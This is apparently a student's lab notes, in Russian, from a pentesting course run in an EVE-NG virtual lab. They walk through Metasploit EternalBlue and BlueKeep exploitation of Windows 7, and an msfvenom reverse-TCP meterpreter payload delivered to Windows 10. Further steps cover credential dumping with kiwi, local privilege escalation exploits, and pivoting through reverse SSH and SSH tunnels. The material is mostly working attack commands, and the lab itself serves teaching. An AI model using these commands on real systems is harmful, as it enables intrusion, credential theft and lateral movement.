# Practice 3 4 new [toc] ## Задание к практической работе №3 - Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать) - Настроить каждое устройство в соответсвии со следующими параметрами: - Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP - На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины - Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов - Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины - Используя payload meterpreter: - выполнить создание нового пользователя - Выполнить скриншот рабочего стола - получить все учетные записи, находящиеся в памяти системы - Выполнить проксирование трафика во внутреннюю инфраструктуру ## Реализация ## 3 практика (проксирование трафика)  Инфраструктура:  Pfsense:  win7 - user, eve@123 win7: Заходим на firewall (admin, eve@123)   Пробросим порты 445 и 3389: ip win7:    kali - user, eve@123 kali: Посмотрим ip адрес (ip a)  Просканируем порты 445 и 3389 на внешнем адресе pfsense в агрессивном режиме:  Подключимся через xfreerdp:  Документация Metasploit Framework: https://www.offensive-security.com/metasploit-unleashed/ Запускаем msf:  Показать эксплоиты:  Показать пейлоады  Ищем уязвимость ms17-010:  Информация об eternalblue:  kali: Для использования eternalblue - use 0:  show options - параметры set forceexploit true/false - необязательный параметр set rhosts 192.168.44.130 - куда подсоединяться (указываем внешний ip pfsense) run - запустить  Meterpreter commands: https://habr.com/ru/post/131112/ Продвинутое туннелирование: https://habr.com/ru/post/326148/ search bluekeep use 1  show options set rhosts 192.168.44.130 show targets set target 8 run  screenshare - запись экрана  shell - командная строка chcp 65001 - поменять кодировку whoami  exit show payloads Меняем payload:   set viewonly false run Возвращаем payload:  run Загружаем kiwi:  creds_all bg > Выбираем пост эксполит методы: >  > >  > > show options > sessions > set sessions 6 >  Возвращаемся к сессии: sessions 6 Создаем пользователя:  Пробрасываем порт до pfsense с win7: portfwd add -L 192.168.44.131(kali ip) -l 2323(random port) -p 443(win 7 port) -r 192.168.1.1(pf sense local ip)  Подключаемся к себе на порт:   // Подключаем kali внутрь инфраструктуры:  kali: Заходим под рут:  Сканируем сеть 192.168.1.0/24:  Узнаем операционную систему:  Сканируем в агрессивном режиме:  kali: msfconcole show exploits search 2021 kali: apt update apt install metasploit-framework cd /usr/share/metasploit-framework ls -lh cd modules ls -lh cd exploits ls -lh kali: msfconsole search 2021 search 2022 search 2020 search smb search ms17-010 use 0 show options set rhosts 192.168.1.102 run bg kali: nmap 192.168.1.0 -sn nmap 192.168.1.105 -A win10: выполнить mmc -> добавить оснастку -> локальные пользователи -> ок -> новый пользователь отключаем защитник, брэндмауэр и включаем удаленный доступ kali: nmap 192.168.1.105 -A > set rhosts 192.168.1.105 > run > search bluekeep > use 1 > set rhosts 192.168.1.105 > run > set ForceExpit true > run > set fDisableCam=0 > run > set rhosts 192.168.1.102 > run > show targets > set target 8 > run Для взлома win10 создадим пэйлоад: MSFVenom: https://www.offensive-security.com/metasploit-unleashed/msfvenom/ Payload: https://habr.com/ru/company/ruvds/blog/343612/ Создаем payload: kali: msfvenom -h mkdir payloads cd payloads msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.103(kali) LPORT=4444 -f(тип файла) exe -o(аутпут файл) meterpreter.exe ls  Поднимаем сервер для передачи ексешника: kali: python -m http.server 80  win10: открываем в браузере 192.168.1.103(kali) и скачиваем exe Настраиваем сервер: kali: msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp show options set lhost 0.0.0.0 run win10: Запускаем exe kali: screenshare screenshot load kiwi creds_all getsystem shell whoami sysinfo Расширим права user1: kali: bg > use exploit/windows/local/cve_2021_40449 > show options > sessions > set session 3 > run > sel lport 5555 > run > use exploit/windows/local/cve_2020_0796_smbghost > show options > set lport 5555 > set session 3 > run > set payload windows/x64/shell/reverse_tcp > run > use exploit/windows/local/bypassuac_fodhelper > show options > set session 3 > run >  Через win10 ломаем win7 (Reverse SSH): Переносим kali за инфраструктуру С win10 открываем соединение до kali: kali: sudo service ssh start sudo systemctl enable ssh win10: cmd -> ssh ssh user@192.168.44.131(kali ip)  Магия ssh: https://habr.com/ru/post/331348/ Используем Remote TCP Forwarding kali: sudo -i ss -tunlp win10: cmd -> ssh -R 3390(kali port):localhost:3389(kali port) user@192.168.44.131(kali ip)  kali: xfreerdp /u:user /p:eve@123 /v:127.0.0.1:3390  kali(win10 rdp): cmd -> ssh -R 4445:192.168.1.102(win7 ip):445 user@192.168.44.131(kali ip)  kali: ss -tunlp msfconsole > search eternalblue > use 0 > set rhosts 127.0.0.1 > set rport 4445 > show options > run kali(win10 rdp): ssh -R 3389:192.168.1.102(win7 ip):3389 user@192.168.44.131(kali ip) kali: msfconsole search bluekeep use 1 show options set rhosts 127.0.0.1 set target 8 run shell whoami  ## 4 практика (тунелированние трафика)     Создаем новую практику debian(user, eve@123) debian: ip a Настраиваем ip: nano /etc/network/interfaces в primary network добавляем auto ens3 меняем в primary network все на ens3 save service networking restart ip a ping 8.8.8.8 kali: service ssh status **Reverse SSH connect:** win10: cmd -> ssh user@192.168.44.131(kali ip) cmd -> ssh -R 3395(kali port):localhost:3389(win10 ip, port) user@192.168.44.131(kali ip) kali: ss -tunlp Подключаемся к порту: xfreerdp /u:user /p:eve@123 /v:127.0.0.1:3395 Теперь взломает win7 через debian: debian: ssh -R 3395:192.168.1.103:3389(win7 ip, port) user@192.168.44.131(kali ip)  kali: xfreerdp /u:user /p:eve@123 /v:127.0.0.1:3395 kali: msfconsole search bluekeep use 1 set rhosts 127.0.0.1 set rport 3395 show targets set target 8 run **SSH tunneling L3:** Включаем таннелинг: kali: sudo nano /etc/ssh/sshd_config PermitRootLogin yes PermitTunnel yes sudo service ssh restart Меняем пароль от рута: sudo passwd root (eve@123) debian: ssh root@192.168.44.131(kali ip) Делаем туннелирование: Проверияем есть ли таб, тан интерфейсы(ip a), debian: ssh -w 0:0(тан интерфейсы на нашей и чужой системе соответственно) root@192.168.44.131(куда коннект, kali ip) ctrl+alt+f2 (новое окно) ip a kali: ip a Настраиваем тан интерфейс: kali: sudo -i ip addr add 10.8.0.1/24 dev tun0 ip link set tun0 up ip a debian: sudo -i ip addr add 10.8.0.2/24 dev tun0 ip link set tun0 up ip a kali: ping 10.8.0.2 Включаем роутинг, чтобы между ens3 и tun происходила маршрутизация: debian: nano /etc/sysctl.conf ip_forward=1 вкл save sysctl -p ip a kali: ip route add 192.168.1.0/24 via 10.8.0.2 ping 192.168.1.104 debian: ip route apt update apt install tcpdump tcpdump -i ens3 Делаем NAT: debian: iptables -t nat -A POSTROUTING -o ens3 -j MASQUERADE kali: ping 192.168.1.1 xfreerdp /u:user /p:eve@123 /v:192.168.1.103:3389(win7) **SSH tunneling L2:** Переделываем инфраструктуру: debian 2 ethernet ports и между pfsense и switch делаем мост на debian (ens3 и ens4 в bridge) debian: ip a apt update apt install bridge-utils nano /etc/network/interfaces primary network: auto ens3 allow-hotplug удалить и поставить manual вместо dhcp везде ens3 добавить auto ens4 iface ens4 inet manual auto br0 iface br0 inet dhcp bridge_ports ens3 ens4  service networking restart ip a debian: tcpdump -i br0 tcpdump -i br0 | grep ICMP kali: ip a Делаем тоннель: debian: ssh root@192.168.44.131(kali ip) -o Tunnel=ethernet -w any:any kali: ip a debian: ip a Добавляем интерфейс в бридж: debian: brctl show brctl addif br0 tap0 brctl show Поднимаем tap интерфейс: debian: ip link set dev tap0 up ip a kali: ip link set dev tap0 up tcpdump -i tap0 dhclient tap0 ip a ## Доп инфа Проброс портов (Port Forwarding) https://wiki5.ru/wiki/Port_forwarding 3 практика - Reverse Shell соединение через проброс портов до Win7, Reverse Shell - пользователь запускает код у себя на машинке и устанавливает соединение 4 практика - Reverse SSH соединение за счет наличия машинки внутри LAN и туннелирования трафика на машинку в WAN 445 порт - Microsoft SMB, используется Windows для совместной работы с файлами (EternalBlue — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB) 3389 порт - RDP, удаленный доступ (BlueKeep — это компьютерная уязвимость в реализации Microsoft Remote Desktop Protocol, позволяющая осуществить удалённое выполнение кода) freerdp - клиент с открытым кодом для подключения к удаленному рабочему столу по протоколу RDP Metasploit Framework: exploits - использование уязвимости auxiliary - тест на уявзимость post - код после эксплоита payloads - код на системе Reverse Shell Reverse SSH